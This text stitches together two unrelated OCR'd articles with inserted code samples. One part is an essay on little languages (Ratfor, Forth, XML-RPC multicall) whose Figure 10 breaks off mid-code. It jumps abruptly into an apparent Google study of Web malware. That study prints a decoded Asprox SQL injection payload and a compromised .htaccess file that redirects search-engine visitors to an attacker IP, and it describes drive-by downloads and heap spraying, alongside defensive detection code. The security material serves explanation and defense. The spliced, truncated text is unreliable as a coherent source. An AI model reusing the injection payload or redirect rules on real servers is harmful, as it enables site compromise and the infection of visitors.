Another example of this type of mutation in early Unix was the Ratfor (Rational Fortran) preprocessor developed by Kernighan. Ratfor permitted the author to write Fortran code with C expressions and logical blocks, and the result was translated into Fortran syntax with line numbers and goto statements, as shown in Figure 6.
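The core of such a translation is lowering a structured if/else into a conditional jump, an unconditional jump and two labels. The following is a toy Python translator under stated assumptions:

- It rewrites C-style relational operators into their Fortran spellings.
- It negates the whole condition rather than inverting it, as the hand-written Fortran in Figure 6 does.
- It places each label on a continue statement.

Ratfor's real output differed in detail (for example, in how it generated labels).

```python
import re
from itertools import count
from typing import Iterator, List

# C-style relational operators and their Fortran spellings (longest first).
FORTRAN_OPS = {"<=": ".le.", ">=": ".ge.", "==": ".eq.", "!=": ".ne.", "<": ".lt.", ">": ".gt."}
OP_PATTERN = re.compile("|".join(re.escape(op) for op in FORTRAN_OPS))


def lower_if_else(cond: str, then_part: List[str], else_part: List[str],
                  labels: Iterator[int]) -> List[str]:
    """Translate a structured if/else into fixed-form Fortran IF ... GOTO lines."""
    fortran_cond = OP_PATTERN.sub(lambda m: FORTRAN_OPS[m.group()], cond)
    else_label, end_label = next(labels), next(labels)
    return [
        f"      if (.not. ({fortran_cond})) goto {else_label}",
        *(f"      {stmt}" for stmt in then_part),
        f"      goto {end_label}",
        f"{else_label:5d} continue",  # label in columns 1-5, statement from column 7
        *(f"      {stmt}" for stmt in else_part),
        f"{end_label:5d} continue",
    ]


for line in lower_if_else("a <= b", ["sw = 0", "write(6, 1) a, b"],
                          ["sw = 1", "write(6, 1) b, a"], count(10, 10)):
    print(line)
```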

An even stranger mutant language was a hybrid of C and Algol syntax developed using the C preprocessor and used in the code for, what else, adb. Apparently, Steve Bourne, the author of the Algol-like Unix sh syntax, was determined that some of Algol’s genome would carry on in the species. Some sample code is shown in Figure 7. Alas, a later version of the code was run through the preprocessor and then checked in so as to ease maintenance. Many later languages have included more clearly designed crossbreeding to ease the transition from one environment to another. Following the widespread adoption of C, its expression syntax found its way into an incredible number of new languages, little and big, including Awk, C++, Java, JavaScript, D, Ruby, and many others. Similarly, following the success of Perl, many other scripting languages adopted its useful extensions to regular expression syntax as a new canonical form. Core concepts such as expression syntax often form the bulk of a small language, and borrowing from a well-established model permits rapid language implementation and rapid adoption by users.


Symbiosis

In the development of a larger software system, little languages often live in symbiotic partnership with the mainstream development language or with the software system itself. The adb macro language described earlier would likely not have survived outside of the source-code base of its Unix parent. The macro language of your favorite spreadsheet is another example: it exists to provide a convenient way to manipulate the user-visible abstractions of the containing software application.

In the operating-system world, my favorite little-known example of symbiosis is the union of Forth and SPARC assembly language created at Sun as part of the work on the OpenBoot firmware. The idea was to create a small interpreter used as the boot environment on SPARC workstations. Forth was chosen for the boot and hardware bring-up environment for new hardware because the language kernel was tiny and could be brought up immediately on a new processor and platform. Then, using the Forth dictionaries, new commands could be defined on the fly in the interpreter for debugging. Since Forth permits its dictionaries to override the definition of words (tokens) in the interpreter, someone developed the creative idea of using the interpreter as a macro assembler for the hardware. A set of dictionaries was created that redefined each of the opcodes in SPARC (“ld,” “move,” “add,” and so on) with Forth code that would compute the binary representation of the assembled instructions and store them into memory. Therefore, entire low-level functions could be written in what appeared to be assembly language, prefixed with Forth headers, and typed into the tiny interpreter, which would then assemble the object code in memory as it parsed the tokens and executed the resulting routine.
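The trick can be sketched with a toy Forth-style interpreter in Python:

- Numbers and register names are pushed on a data stack.
- Words are looked up in a dictionary.
- Defining the word "add" to encode an instruction turns the interpreter into an assembler.

The postfix operand order ("%g1 %g2 %g3 add" for "add %g1, %g2, %g3") and all names here are hypothetical, not OpenBoot's actual assembler syntax. Only the register form of ADD is encoded, using the SPARC format-3 instruction layout.

```python
from typing import Callable, Dict, List

# SPARC global registers %g0-%g7 are integer registers 0-7.
REGISTERS = {f"%g{i}": i for i in range(8)}


def encode_add(rs1: int, rs2: int, rd: int) -> int:
    """SPARC format-3 ADD, register form: op=2, op3=0, i=0."""
    return (2 << 30) | (rd << 25) | (0b000000 << 19) | (rs1 << 14) | rs2


class ToyForth:
    def __init__(self) -> None:
        self.stack: List[int] = []
        self.memory: List[int] = []  # assembled 32-bit instruction words
        self.words: Dict[str, Callable[["ToyForth"], None]] = {}

    def define(self, name: str, action: Callable[["ToyForth"], None]) -> None:
        self.words[name] = action  # a later definition overrides an earlier one

    def interpret(self, source: str) -> None:
        for token in source.split():
            if token in self.words:
                self.words[token](self)
            elif token in REGISTERS:
                self.stack.append(REGISTERS[token])
            else:
                self.stack.append(int(token, 0))


def assemble_add(forth: ToyForth) -> None:
    rd, rs2, rs1 = forth.stack.pop(), forth.stack.pop(), forth.stack.pop()
    forth.memory.append(encode_add(rs1, rs2, rd))


forth = ToyForth()
forth.define("add", assemble_add)
forth.interpret("%g1 %g2 %g3 add")  # postfix form of "add %g1, %g2, %g3"
print(hex(forth.memory[0]))         # 0x86004002
```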

In recent years, Web browsers have 
become fertile ground for mutation 
and symbiosis. Two central figures in 
modern Web development are inter- 
preted JavaScript and XML. (XML it- 
self is the syntax for a variety of other 
languages and an abundant source of 
hybrid languages and mutations.) In 
the common Ajax programming mod- 
el, JavaScript objects can be serialized 
to XML form, and XML encodings can 
be used to pass remote procedure 
calls back to a server. In one such en- 
coding, XML-RPC, a standard exten- 
sion called multicall is provided for 
the browser client to issue multiple 
procedure calls from the client to the 
server in a single transfer. An exam- 
ple of a single call to a method x.foo 
and then a series of calls to the same 
method using multicall is shown in 
Figure 8. 
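The difference between one call and a batched multicall is visible in the serialized requests. The following sketch uses Python's standard xmlrpc.client module rather than browser JavaScript. It builds both requests for the x.foo example and round-trips the batched one. The payload shape (a list of structs with methodName and params) follows the multicall convention described above. In a real Python client, xmlrpc.client.MultiCall would assemble this list for you.

```python
import xmlrpc.client

# One call, as in the first line of Figure 8.
single = xmlrpc.client.dumps(({"bar": 123, "baz": 456},), methodname="x.foo")

# Three calls batched into one request with the multicall convention.
calls = [
    {"methodName": "x.foo", "params": [{"bar": 123, "baz": 456}]},
    {"methodName": "x.foo", "params": [{"bar": 789, "baz": 654}]},
    {"methodName": "x.foo", "params": [{"bar": 222, "baz": 333}]},
]
batched = xmlrpc.client.dumps((calls,), methodname="system.multicall")

params, method = xmlrpc.client.loads(batched)
print(method, len(params[0]))  # system.multicall 3
```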

While implementing Ajax user-interface code for a new line of storage products, the Sun Fishworks team wanted to develop a way to minimize unnecessary client-server interactions. The first concept developed was the notion of a multicall invocation whose parameter was the result of another call. In the example shown in Figure 9, the method x.foo is called on the result of x.bar in a single XML-RPC interaction.

The trick here is that the new struc- 
ture member methodParams indi- 
cates that the next members are not 
static parameters but more methods 
to be called recursively, with the result 
pushed onto a stack. Once a stack had 
been born, it was only natural to start 
throwing in operators from a stack- 
based language, forming an entirely 
new interpreted language that itself 
is declared as data in JavaScript, sent 
to the server by the existing XML-RPC 
serialization, and executed by exten- 
sions to our XML-RPC interpreter 
engine. A few of the operators that we implemented at Sun are shown in Figure 10.
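The server side of methodParams can be sketched as a recursive evaluator that pushes each inner call's result onto a stack and then pops those results off as the outer call's arguments. This is a hypothetical Python illustration, not the Fishworks engine. The x.bar and x.foo implementations are invented stand-ins, and the stack operators of Figure 10 are not modeled. For simplicity it also returns bare results rather than the one-element arrays that standard multicall responses wrap around each result.

```python
from typing import Any, Callable, Dict, List

Methods = Dict[str, Callable[..., Any]]


def run_call(call: Dict[str, Any], methods: Methods, stack: List[Any]) -> Any:
    """Evaluate one call; nested methodParams are evaluated first onto the stack."""
    if "methodParams" in call:
        base = len(stack)
        for inner in call["methodParams"]:
            stack.append(run_call(inner, methods, stack))  # push each inner result
        args = stack[base:]
        del stack[base:]  # pop them off again as this call's arguments
    else:
        args = list(call.get("params", []))
    return methods[call["methodName"]](*args)


def multicall(calls: List[Dict[str, Any]], methods: Methods) -> List[Any]:
    stack: List[Any] = []
    return [run_call(call, methods, stack) for call in calls]


# Hypothetical server methods standing in for x.bar and x.foo.
methods: Methods = {"x.bar": lambda *xs: sum(xs), "x.foo": lambda v: v * 10}
request = [{"methodName": "x.foo",
            "methodParams": [{"methodName": "x.bar", "params": [1, 2, 3]}]}]
print(multicall(request, methods))  # [60]
```

Because each level records the stack depth before evaluating its own inner calls, nested methodParams compose without interfering with one another.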
This example illustrates that the symbiotic relationship between JavaScript and XML essentially allows our language to exist without requiring its own lexer or parser, and it fundamentally serves the purpose of offloading performance-critical code from JavaScript to our server and minimizing round-trips. In the videogame industry, a similar symbiosis (without the hybrid syntax) has developed between Lua and C/C++. The Lua scripting language provides a popular form for writing non-performance-critical code in videogame engines, and the Lua interpreter design makes it easy to bridge to C code.

Figure 8: JavaScript, XML-RPC, and Multicall.

x.foo({ bar: 123, baz: 456 });

system.multicall(
    { methodName: 'x.foo', params: [ { bar: 123, baz: 456 } ] },
    { methodName: 'x.foo', params: [ { bar: 789, baz: 654 } ] },
    { methodName: 'x.foo', params: [ { bar: 222, baz: 333 } ] }
);

Figure 9: Multicall with parameterized results.

system.multicall(
    { methodName: 'x.foo', methodParams: [
        { methodName: 'x.bar', params: [ 1, 2, 3 ] }
    ] }
);

Figure 10: Multicall with stack operators.

system.multicall(
    { foreach: [ [ 2, 4, 6 ], [
        { methodName: 'x.foo', params: [] },
        { push: [] },

Once two or more languages are interacting in a large software system, it becomes only natural for an ecosystem of tools (likely incorporating little languages with hybrid syntax) to spring up around them to ease the maintenance, development, and debugging of the entire system. The richer the ecosystem that grows around the languages of a complete software system, both little and big, purpose-built and general-purpose, the longer the overall environment will thrive and its constituents survive. Therefore, as we build our towers of software abstraction ever higher, we should expect to see and know more languages, not fewer.
Not only did they change their tactics, but they also changed their motivation. Previously, large-scale events such as network worms were mostly exhibitions of technical superiority. Today, adversaries are primarily motivated by economic incentives not only to exploit and seize control of compromised systems for as long as possible but also to turn their assets into revenue.

The Web offers adversaries a pow- 
erful infrastructure to compromise 
computer systems and monetize the 
resulting computing resources as well 
as any information that can be stolen 
from them. Adversaries achieve this by 
employing the Web to serve malicious 
Web content capable of compromising 
users’ computers and running arbitrary 
code on them. This has largely been enabled by the increased complexity of Web browsers and the resulting vulnerabilities that come with complex software. For example, a modern Web browser provides a powerful computing platform with access to different scripting languages (for example, JavaScript) as well as external plugins that may not follow the same security policies applied by the browser (for example, Flash, Java). While these capabilities enable sophisticated Web applications, they also allow adversaries
to collect information about the target 
system and deliver exploits specifically 
tailored to a user’s computer. Web at- 
tacks render perimeter defenses that 
disallow incoming connections use- 
less against exploitation as adversaries 
use the browser to initiate out-bound 
connections to download attack pay- 
loads. This type of traffic looks almost 
identical to the users’ normal brows- 
ing traffic and is not usually blocked by 
network firewalls. 

To prevent Web-based malware 
from infecting users, Google has de- 
veloped an infrastructure to identify 
malicious Web pages. The data result- 
ing from this infrastructure is used to 
secure Web search results as well as 
protect browsers such as Firefox and Chrome. In this article, we discuss interesting Web attack trends as well as some of the open challenges associated with this rising threat.


Web Attacks 

As Web browsers have become more 
capable and the Web richer in features, 
it is difficult for the average user to un- 
derstand what happens when visiting a 
Web page. In most cases, visiting a Web page causes the browser to pull content from a number of different providers, for example, to show third-party ads, interactive maps, or online videos. The sheer number of possibilities to design Web pages and make them attractive to users is staggering. Overall, these features increase
the complexity of the components that 
constitute a modern Web browser. Un- 
fortunately, each browser component 
may introduce new vulnerabilities an 
adversary can leverage to gain control 
over a user’s computer. Over the past 
few years we have seen an increasing 
number of browser vulnerabilities,*® 
some of which have not had official 
fixes for weeks. 

For an adversary to exploit a vulnerability, the user must visit a Web page that contains malicious content. One way to attract user traffic is to send spam email messages that advertise links to malicious Web pages. However, this delivery mechanism has some drawbacks. For the exploit to be delivered, the user must open the spam email and then click on the embedded link. The ubiquitous Web infrastructure provides a better solution to this bottleneck. While it is easy to exploit a Web browser, it is even easier to exploit Web servers. The relative simplicity of setting up and deploying Web servers has resulted in a large number of Web applications with remotely exploitable vulnerabilities. Unfortunately, these vulnerabilities are rarely patched, and therefore, remote exploitation of Web servers is increasing. To exploit users, adversaries just need to compromise a Web server and inject malicious content, for example, via an IFRAME pointing to an exploit server. Any visitor to such a compromised Web server becomes a target of exploitation. If the visitor’s system is vulnerable, the exploit causes the browser to download and execute arbitrary payloads. We call this process “drive-by download.” Depending on the popularity of the compromised Web site, an adversary may get access to a large user population. Last year, Web sites with millions of visitors were compromised that way.

Taking Over Web Servers. Turning Web servers into infection vectors is unfortunately fairly straightforward. Over the last couple of years, we have observed a number of different attacks against Web servers and Web applications, ranging from simple password guessing to more advanced attacks that can infect thousands of servers at once. In general, these attacks aim at altering Web site content to redirect visitors to servers controlled by the adversary. Here, we expand on some examples of recent dominant server attacks.

SQL Injection Attacks. SQL injection 
is an exploitation technique commonly 
used against Web servers that run vulnerable database applications. The vulnerability arises when user input is not properly sanitized (for example, by filtering escape characters and string literals), so that well-crafted user input is interpreted as code and executed on the server. SQL injection
has been commonly used to perpetrate 
unauthorized operations on a vulner- 
able database server such as harvesting 
users’ information and manipulating 
the contents of the database. In Web 
applications running a SQL database to 
manage users’ authentication, adver- 
saries use SQL injection to bypass login 
and gain unauthorized access to user 
accounts or, even worse, to gain admin- 
istrative access to the Web application. 
Other variants of these attacks allow the 
adversary to directly alter the contents 
of the server’s database and inject the 
adversary’s own content. 
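The login-bypass case can be reproduced in a few lines. The following sketch uses Python's built-in sqlite3 module in place of the SQL Server databases discussed in the article. The table, user and password are invented. The first function pastes user input into the SQL text, so a quote in the input can end the string literal and rewrite the WHERE clause. The second uses placeholders, so the input is passed as data and never parsed as SQL.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")


def login_vulnerable(name: str, password: str) -> bool:
    # Input is pasted into the SQL text, so a quote in it can end the string literal.
    query = f"SELECT COUNT(*) FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(query).fetchone()[0] > 0


def login_safe(name: str, password: str) -> bool:
    # Placeholders send the input as data; it is never parsed as SQL.
    query = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone()[0] > 0


attack = "' OR '1'='1"
print(login_vulnerable("alice", attack))  # True: the WHERE clause is always true
print(login_safe("alice", attack))        # False
```

Input filtering, as mentioned above, is a second line of defense. Parameterized queries remove the ambiguity between code and data in the first place.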

Last year, a major SQL injection at- 
tack was launched by the Asprox bot- 
net.'* In this attack several thousand 
bots were equipped with an SQL injec- 
tion kit that starts by sending specially 
crafted queries to Google searching 
for servers that run ASP.net, and then 
launches SQL injection attacks against 
the Web sites returned from those 
queries. In these attacks the bot sends an encoded SQL query containing the exploit payload (similar to the format shown here) to the target Web server.

http://www.victim-site.com/asp_application.asp?arg=<encoded sql query>

The vulnerable server decodes and executes the query payload which, in the Asprox case, yields SQL code similar to the snippet shown in Figure 1. The decoded payload searches the database’s user tables for Unicode and ASCII text columns and appends an IFRAME or a script tag to their contents. The injected content redirects the Web site users to Web servers controlled by the adversary and therefore subjects them to direct exploitation.
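A site owner cleaning up after such an attack faces the mirror-image task: enumerate every table and text column, as the payload in Figure 1 does, and look for appended markup. The following read-only sketch makes several substitutions and assumptions:

- It uses SQLite's catalog (sqlite_master and PRAGMA table_info) instead of SQL Server's sysobjects and syscolumns.
- It treats a column as text if its declared type contains CHAR, CLOB or TEXT.
- It flags values with a crude regular expression for script or iframe tags.

It is a heuristic illustration, not a complete detector.

```python
import re
import sqlite3
from typing import List, Tuple

INJECTED = re.compile(r"<\s*(?:script|iframe)\b", re.IGNORECASE)
TEXT_TYPES = ("CHAR", "CLOB", "TEXT")  # SQLite's rule for text affinity


def quote_ident(name: str) -> str:
    return '"' + name.replace('"', '""') + '"'


def find_injected(conn: sqlite3.Connection) -> List[Tuple[str, str, int]]:
    """Return (table, column, rowid) for text values containing script/iframe tags."""
    hits = []
    tables = [row[0] for row in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        columns = [row[1] for row in conn.execute(f"PRAGMA table_info({quote_ident(table)})")
                   if any(t in row[2].upper() for t in TEXT_TYPES)]
        for column in columns:
            query = f"SELECT rowid, {quote_ident(column)} FROM {quote_ident(table)}"
            for rowid, value in conn.execute(query):
                if isinstance(value, str) and INJECTED.search(value):
                    hits.append((table, column, rowid))
    return hits


db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE pages (id INTEGER, body TEXT)")
db.executemany("INSERT INTO pages VALUES (?, ?)", [
    (1, "hello"),
    (2, 'news<script src="http://example.invalid/x.js"></script>'),
])
print(find_injected(db))  # [('pages', 'body', 2)]
```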

We monitored the Asprox botnet 
over the past eight months, and ob- 
served bots getting instructions to re- 
fresh their lists of the domains to in- 
ject. Overall, we have seen 340 different 
injected domains. Our analysis of the 
successful injections revealed that ap- 
proximately six million URLs belonging 
to 153,000 different Web sites were vic- 
tims of SQL injection attacks by the As- 
prox botnet. While the Asprox botnet is 
no longer active, several victim sites are 
still redirecting users to the malicious 
domains. Because bots inject code in 
a non-coordinated manner, many Web 
sites end up getting multiple injections 
of malicious scripts over time. 

Redirections via .htaccess. Even when the Web pages on a server are harmless and unmodified, a Web server may still direct users to malicious content. Recently, adversaries compromised Apache-based Web servers and altered the configuration rules in the .htaccess file. This configuration file can be used for access control, but also allows for selective redirection of URLs to other destinations. In our analysis of Web servers, we have found several incidents where adversaries installed .htaccess configuration files to redirect visitors to malware distribution sites, for example, to fake anti-virus sites as we discuss later.

One interesting aspect of .htaccess redirections is the attempt to hide the compromise from the site owner. For example, redirection can be conditional based on how a visitor reached the compromised Web server as determined by the HTTP Referer header of the incoming request. In the incidents we observed, the .htaccess rules were configured so that visitors arriving via search engines were redirected to a malware site. However, when the site owner typed the URL directly into the browser’s location bar, the site would load normally as the Referer header was not set.
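The Referer trick also suggests a simple check: request the same page with and without a search-engine Referer and compare the responses. The sketch below emulates the conditional behavior with the two referrer patterns recoverable from Figure 2. It makes these assumptions:

- Case-insensitive matching.
- A hypothetical placeholder staging URL.
- A plain callable standing in for an HTTP fetch.

A real probe would send the Referer header with an HTTP client and would not follow redirects. Because staging servers may answer only once per visitor, repeated probes can also disagree.

```python
import re
from typing import Callable, Optional

# Patterns recovered from Figure 2; case-insensitive matching is an assumption.
SEARCH_REFERERS = [re.compile(p, re.IGNORECASE) for p in (r".*google.*$", r".*yahoo.*$")]
STAGING_URL = "http://staging.example.invalid/in.html?s=xx"  # hypothetical placeholder


def compromised_site(referer: Optional[str]) -> str:
    """Emulate Referer-conditional redirection like the rules in Figure 2."""
    if referer and any(p.match(referer) for p in SEARCH_REFERERS):
        return f"302 {STAGING_URL}"
    return "200 original page"


def looks_cloaked(fetch: Callable[[Optional[str]], str]) -> bool:
    """Compare a direct visit (no Referer) with a visit that appears to come from search."""
    return fetch(None) != fetch("http://www.google.com/search?q=example")


print(compromised_site(None))           # 200 original page (what the owner sees)
print(looks_cloaked(compromised_site))  # True
```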

Figure 2 shows an example of a compromised .htaccess file. In this example, users visiting the compromised site via any of the listed search engines will be redirected to http://89.28.13.204/in.html?s=xx. Notice that the initial redirect is usually to an IP address that acts as a staging server and redirects users to a continuously changing set of domains. The staging server manages which users get redirected where. For example, the staging server may check whether the user has already visited the redirector and return an empty payload on any subsequent visit. We assume this is meant to make analysis and reproduction of the redirection chain more difficult. Adversaries also frequently rewrite the .htaccess file to point to different IP addresses. Removing the .htaccess file without patching the original vulnerability or changing the server credentials will not solve the problem. Many Web masters attempted to delete the .htaccess file and found a new one on their servers the next day.

Figure 1. A decoded snippet of the SQL injection query sent by Asprox bots.

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35
OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+']
SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''""''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Taking Over Web Users. Once the adversaries have turned a Web server into an infection vector, visitors to that site are subjected to various exploitation attempts. In general, client exploits fall under two main categories: automated drive-by downloads and social engineering attacks.


Figure 2. A snippet from the .htaccess file of a compromised Apache server.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]

Drive-by downloads. In this category, adversaries attempt to exploit flaws in the browser, the operating system, or the browser's external plugins. A successful exploit causes malware to be delivered and executed on the user's machine without her knowledge or consent. For example, a popular exploit we encountered takes advantage of a vulnerability in Microsoft Data Access Components (MDAC) that allows arbitrary code execution on a user's computer.’ A 20-line JavaScript code snippet was enough to exploit this vulnerability and initiate a drive-by download.

Another popular exploit is due to a vulnerability in Microsoft Windows WebViewFolderIcon. The exploit JavaScript uses a technique called heap spraying that creates a large number of JavaScript string objects on the heap. Each JavaScript string contains x86 machine code (shellcode) necessary to download and execute a binary on the exploited system. By spraying the heap, an adversary attempts to create a copy of the shellcode at a known location in memory and then redirects program execution to it.

Social engineering attacks. When drive-by downloads fail to compromise a user's machine, adversaries often employ social engineering techniques to trick users into installing and running malware by themselves. Unfortunately, the Web is
rich with deceptive content that lures 
users into downloading malware. 

One common class of attacks in- 
cludes images that resemble popular 
video players, along with a false warning 
that the computer is missing essential 
codecs for displaying the video, or that a 
newer version of the video player plugin 
is required to view it. Instead, the pro- 
vided link is for downloading a trojan 
that, once installed, gives the adversary 
full control over the user’s machine. 

A more recent trick involves fake 
security scans. A specially crafted Web 
site displays fake virus scanning dia- 
logs, along with animated progress 
bars and a list of infections presumably 
found on the computer. All the warn- 
ings are false and are meant to scare 
the user into believing their machine 
is infected. The Web site then offers a download as a solution, which could be another trojan, or asks the user for a registration fee to perform an unnecessary clean-up of their machine.


We have observed a steady increase in fake anti-virus attacks: from July to October 2008, we measured an average of 60 different domains serving fake security products, infecting an average of 1,500 Web sites. In November and December 2008, the number of domains increased to 475, infecting over 85,000 URLs. At that time the Federal Trade Commission reported that more than one million consumers were tricked into buying these products, and a U.S. district court issued a halt and an asset freeze on some of the companies behind these fake products.’ This does not appear to have been sufficient to stop the scheme. In January 2009, we observed over 450 different domains serving fake security products, and the number of infected URLs had increased to 148,000.

Malware activities on the user's machine. Whether a user was compromised by a social engineering attack or a successful exploit and drive-by download, once the adversaries have control over a user's machine, they usually attempt to turn their work into profit.

In prior work,¹⁰ we analyzed the behavior of Web malware installed by drive-by downloads. In many cases, malware was equipped with key-loggers to spy on the user's activity. Often, a backdoor was installed, allowing the adversary to access the machine directly at a later point in time. More sophisticated malware turned the machine into a bot listening to remote commands and executing various tasks on demand. For example, common uses of botnets include sending spam email or harvesting passwords or credit cards. Botnets afford the adversary a degree of anonymity, since spam email appears to be sent from a set of continuously changing IP addresses, making it harder to blacklist them.


To help improve the safety of the Internet, we have developed an extensive infrastructure for identifying URLs that trigger drive-by downloads. Our analysis starts by inspecting pages in Google's large Web repository. Because the repository contains billions of pages, exhaustive inspection of each page is prohibitively expensive, so we have developed a lightweight system to identify candidate pages that are more likely to be malicious. The candidate pages are then subjected to more detailed analysis in a virtual machine, allowing us to determine if visiting a page results in malicious changes to the machine itself. The lightweight analysis uses a machine-learning framework that can detect 90% of all malicious pages with a false positive rate of only 10⁻³. At this false positive rate, the filter reduces the workload of the virtual machines from billions of pages to only millions. The URLs that are determined to be malicious are further processed into host-suffix path-prefix patterns. Since 2006, our system has been used to protect Google's search. Our data is also published via Google's Safe Browsing API to browsers such as Firefox, Chrome, and Safari. These browsers employ our data to prevent users from visiting harmful pages.
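The text says malicious URLs are reduced to host-suffix path-prefix patterns. The Java sketch below follows the lookup-expression scheme described in the public Safe Browsing API documentation, as we understand it. Each host contributes the exact host plus up to four suffixes drawn from its last five components. Each path contributes the exact path with and without the query, plus up to four directory prefixes starting at the root. The sketch skips the URL canonicalization and hashing that the real protocol also specifies, and the class name is hypothetical. Treat it as an illustration, not a client implementation.

```java
import java.net.URI;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Set;

// Sketch of host-suffix/path-prefix lookup expressions (no canonicalization, no hashing).
final class LookupExpressions {
    private LookupExpressions() {}

    static Set<String> forUrl(String url) {
        URI uri = URI.create(url);
        String host = uri.getHost().toLowerCase();
        String rawPath = uri.getRawPath();
        String path = (rawPath == null || rawPath.isEmpty()) ? "/" : rawPath;
        Set<String> out = new LinkedHashSet<>();
        for (String h : hostSuffixes(host)) {
            for (String p : pathPrefixes(path, uri.getRawQuery())) {
                out.add(h + p);
            }
        }
        return out;
    }

    // Exact host, plus up to four suffixes built from the last five components,
    // dropping the leading component each time and never emitting the bare TLD.
    static List<String> hostSuffixes(String host) {
        List<String> hosts = new ArrayList<>();
        hosts.add(host);
        if (host.matches("\\d{1,3}(\\.\\d{1,3}){3}")) {
            return hosts; // IPv4 literal: only the exact host is used
        }
        String[] parts = host.split("\\.");
        for (int i = Math.max(1, parts.length - 5); i <= parts.length - 2; i++) {
            hosts.add(String.join(".", Arrays.copyOfRange(parts, i, parts.length)));
        }
        return hosts;
    }

    // Exact path with and without the query, then up to four directory prefixes
    // starting at the root. The set drops duplicates such as "/" appearing twice.
    static Set<String> pathPrefixes(String path, String query) {
        Set<String> paths = new LinkedHashSet<>();
        if (query != null) {
            paths.add(path + "?" + query);
        }
        paths.add(path);
        String[] segments = path.split("/");
        StringBuilder prefix = new StringBuilder("/");
        paths.add(prefix.toString());
        int prefixes = 1; // the root counts toward the limit of four
        // Stop before the last segment: the exact path already covers it.
        for (int i = 1; i < segments.length - 1 && prefixes < 4; i++) {
            prefix.append(segments[i]).append('/');
            paths.add(prefix.toString());
            prefixes++;
        }
        return paths;
    }
}
```

For http://a.b.c/1/2.html?param=1 this yields eight expressions, from a.b.c/1/2.html?param=1 down to b.c/1/. A single stored pattern such as b.c/1/ can therefore match URLs under that directory on hosts ending in b.c (within the limits above). This is one reason such patterns keep a blocklist compact.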


Challenges 

Despite our efforts to make the Web safer for users, there are still a number of fundamental challenges requiring future work, including:


Securing Web Services. Establishing a presence on the Web, ranging from simple HTML pages to advanced Web applications, has become an easy process that enables even people with little technical knowledge to set up a Web service. However, maintaining such a service and keeping it secure is still difficult. Many Web application frameworks require programmers to follow strict security practices, such as sanitizing and escaping user input. Unfortunately, as this burden is put onto the programmer, many Web applications suffer from vulnerabilities that can be remotely exploited.¹¹ For example, SQL injection attacks are enabled by a programmer neglecting to escape external input.
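The following Java sketch shows why unescaped input is dangerous. When an attacker-supplied value is concatenated into the statement, a quote character can end the string literal and append new SQL. Doubling single quotes keeps the value inside the literal. For real code, JDBC's PreparedStatement with ? placeholders is generally the better choice, because the value is kept separate from the SQL text. The table and column names here are hypothetical.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;

// Contrast between splicing input into SQL text and keeping it out of the statement.
final class SqlInputHandling {
    private SqlInputHandling() {}

    // UNSAFE: external input becomes part of the SQL text itself.
    static String concatenated(String name) {
        return "SELECT * FROM users WHERE name = '" + name + "'";
    }

    // Escaping for a standard SQL string literal: double each single quote so the
    // input cannot close the literal. Dialect-specific escapes are not handled.
    static String escaped(String name) {
        return "SELECT * FROM users WHERE name = '" + name.replace("'", "''") + "'";
    }

    // Generally preferable: a parameterized statement binds the value separately
    // from the SQL text, so no manual escaping is needed. Requires a live Connection.
    static PreparedStatement parameterized(Connection conn, String name) throws SQLException {
        PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE name = ?");
        ps.setString(1, name);
        return ps;
    }
}
```

With the input `x' OR '1'='1`, the concatenated query gains an `OR '1'='1'` clause that matches every row. The escaped version compares `name` against the whole string.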

Popular Web applications such as 
bulletin boards or blogs release secu- 
rity updates frequently, but many ad- 
ministrators neglect to update their 
installations. Even the Web server 
software itself, such as Apache or 
IIS, is often out-of-date. In previous work,¹⁰ we found over 38% of Apache installations and 40% of PHP installations in compromised sites to be insecure and out-of-date.

To avoid the compromise of Web applications, it is important to develop mechanisms to keep Web servers
and Web applications automatically 
patched. Some Web applications al- 
ready notify Web masters about secu- 
rity updates, but the process of actually 
installing security patches is often still 
manual and complicated. 
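One building block for automated patching is deciding whether an installation predates the first release that fixes a known vulnerability. The Java sketch below compares dotted numeric version strings component by component. The version numbers in the example are hypothetical. Plain string comparison would get this wrong ("2.2.8" sorts after "2.2.11"). Real tooling would also have to cope with suffixes such as "-beta" and vendor backports, which this sketch ignores.

```java
// Minimal version comparison for deciding whether an install needs patching.
final class PatchLevel {
    private PatchLevel() {}

    // Compares dotted numeric versions such as "2.2.8" and "2.2.11" numerically,
    // component by component; missing trailing components count as 0.
    static int compare(String a, String b) {
        String[] x = a.split("\\.");
        String[] y = b.split("\\.");
        for (int i = 0; i < Math.max(x.length, y.length); i++) {
            int xi = i < x.length ? Integer.parseInt(x[i]) : 0;
            int yi = i < y.length ? Integer.parseInt(y[i]) : 0;
            if (xi != yi) {
                return Integer.compare(xi, yi);
            }
        }
        return 0;
    }

    // True if the installed version is older than the first patched release.
    static boolean isOutdated(String installed, String firstPatched) {
        return compare(installed, firstPatched) < 0;
    }
}
```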

It is difficult to be completely safe 
against drive-by downloads. All that is 
required for an adversary to gain control 
over your system is a single vulnerabil- 
